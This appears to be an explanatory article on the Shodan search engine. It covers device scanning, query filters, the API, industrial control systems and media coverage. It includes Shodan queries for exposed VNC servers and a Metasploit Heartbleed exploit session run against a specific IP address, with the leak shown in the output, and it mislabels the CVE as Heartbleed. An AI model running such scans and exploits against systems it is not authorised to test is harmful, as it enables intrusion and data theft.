Shodan is widely known as “The World’s First Search Engine for Internet-connected Devices.” We should probably call it the “World’s Most Dangerous Search Engine.” In the following analysis we explain why.
Shodan.io is a website that scans all the IPs on the internet and catalogues whatever device or software it finds running there. Users can then look up a list of, for example, Apache servers worldwide and those that have the Heartbleed bug.
The way it works is that Shodan sends HTTP, HTTPS, telnet, SSL and NTP (network time protocol) and copies the text of response into its searchable database. It also uses Metasploit and Nmap to check out a site’s vulnerabilities, including possible default passwords.
For example, below is the standard response in the HTTP headers when someone opens a web page. As you can see, it reveals some information about itself.
Shodan captures phrases in its database that allows people to search for “MongoDB”, “apache”, “default password”, etc. Shodan also emulates SSL key exchanges and runs exploits to reveal further information about the device.
Shodan seems to be the perfect tool for hackers to search the web, looking for devices it can exploit. Of course, on their website promotional description of their product, they don’t say that they target hackers as an audience, similar to Metasploit, but that it’s merely for penetration testing. Nor do they warn users that looking for vulnerable servers and then trying to log in to those is against the law. Instead, they boast that 56% of Fortune 100 companies, as well as 1,000 universities, use it.
The software’s basic version is free, but you have to pay $49 for full access. The free version limits the number of results displayed to 50. The paid version lets you use the map feature, download search results in JSON format, stream data in real time, and more. For the API, you consume credits. There is also an enterprise license. The instructions are not on the web, but you can buy the manual for as little as $1, or for the $5 suggested price.
How Shodan Works and How to Use It
You can execute Shodan searches on the web page or download its Python command line interface, or use its API. There are many filters such as port, country, and more.
The documentation provides the metrics that it captures, including IP address, list of Elasticsearch peers, website robots.txt file, device location, SSH cipher, etc. It gathers this data using HTTP as well as malware. Below is the result’s first screen.
Shodan’s access is not limited to web servers. It claims to be able to scan for printers, cameras, IoT devices, routers and specific databases.
To execute a query, you can simply enter text and it will reply with those devices that contain that text in the HTTP header, or you can write: query: [filter with a colon (:) after the searchable item]. For example, here are some items you can search for: country, geo (latitude and longitude), hostname, IP, ranges of IPs by CIDR, OS, vuln (specific CVE ID vulnerability).
Users can save queries for others to use. For example, here is one query that shows VNC servers with authentication disabled: port:”5900” authentication disabled. VNC is the remote desktop protocol. But just because it says “authentication disabled” does not mean it truly is; if you click on a few of those, a login screen still pops up.
Searching for exploits is a little different. For example, let’s search for CVE-2014-0050.
This one is in the Shodan manual. As you can see, it is subject to the Heartbleed bug. It cannot obtain that data from the header.
We can verify this by running the exploit with Metasploit. As you can see, the server dumps its memory.
msf > set verbose true
verbose => true
msf > rhosts 22.214.171.124
[-] Unknown command: rhosts.
msf > set rhosts 126.96.36.199
rhosts => 188.8.131.52
msf > run
[-] Unknown command: run.
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > run
[*] 184.108.40.206:443 – Sending Heartbeat…
[*] 220.127.116.11:443 – Heartbeat response, 65535 bytes
[+] 18.104.22.168:443 – Heartbeat response with leak
[*] 22.214.171.124:443 – Printable info leaked:
Shodan not only vacuums up metadata; it takes screenshots as it runs. You can search through its collection of VPN, Windows and other login screens as well as screenshots of the systems into which it has successfully logged into.
There is a Chrome and Firefox plugin for Shodan. It can also be added as an add-on to Maltego, which is an open source forensics application that lets you visually explore data. Doing that adds the Exploit object to Maltego, plus it provides new commands like search Shodan and search Exploits.
The Metasploit API is available in many languages including Python library, Ruby, PHP, C#, GO, Haskell, Java, and others.
Below we search for NGINX web servers in Chile and list their version. As you can see, all the data is not always present.
api = shodan.Shodan(“(obfuscated)”)
result = api.search(query)
for r in result[‘matches’]:
print(“product=” + str(r.get(‘product’)) + “ version=”+str(r.get(‘version’)))
Industrial Control Systems
The user manual has a whole section on how to query industrial control systems, including those that use the ICS protocol like PLC controllers and SCADA, which are used to control machines. ICS requires no authentication at all.
On the left Shodan lists some industrial devices. The minus (-) symbol means ‘not’. Here we exclude web servers and SSH obfuscated by running on non-standard ports, which in this case are those defaults used by Shodan for control devices.
You can use Shodan for penetration on your public-facing IPs. It does not work on internal networks.
John Matherly released Shodan in 2009 after playing around with the basic concept since he was a teenager. The name SHODAN is a character in the System Shock II video game. The goal of the Shodan character is to use artificial intelligence to eradicate humans. The system has surged in popularity. You can see, by looking at some online tutorials and overviews, that a search already returns hundreds of thousands or millions of results.
Shodan has gained the media’s attention too. Forbes wrote about it in 2013, calling it a “terrifying search engine” that can flush out baby monitors and traffic lights. When the reporter writing the article sat down with a security researcher, he watched data streaming from a giant Caterpillar mining truck and a live camera feed of a company’s warehouse. Many of those had no user ID or password at all, or still had default passwords or easily guessed ones.
The Washington Post wrote about Shodan under the headline, “Cyber search engine Shodan exposes industrial control systems to new risks”. According to the article, soon after putting this tool online the developers of Shodan “quickly realized they were revealing an astonishing fact: uncounted numbers of industrial control computers, e.g. systems that automate such things as water plants and power grids, were linked in and, in some cases, were wide open to exploitation by even moderately talented hackers.” The article also helped to raise awareness of this vulnerability, reporting that six researchers from Digital Bound conducted a study of six random SCADA control systems (like those used to open and close valves, etc.) and found they “were riddled with hardware and software flaws.” With Shodan freely available in the market, industrial facilities, power plants and municipalities do not know how exposed they are.
On the flip side, a few years ago, using Shodan, Citizen Lab discovered that BlueCoat sold surveillance and blocking equipment to Iran, Syria and Sudan, thus violating US export sanctions.
Veteran hackers already know about Nmap, Metasploit and Shodan. It is the newbies who will find it difficult to resist the urge to try to log in to devices and run an exploit against such devises. However, a company can also use the tool for penetration testing. A company might already know about its webserver and its exposed port 80 and 636, as well as servers running SSH. But it would be wise to also run the tool against all the public-facing IP addresses they have in order to uncover unsecured routers, cameras, and industrial equipment.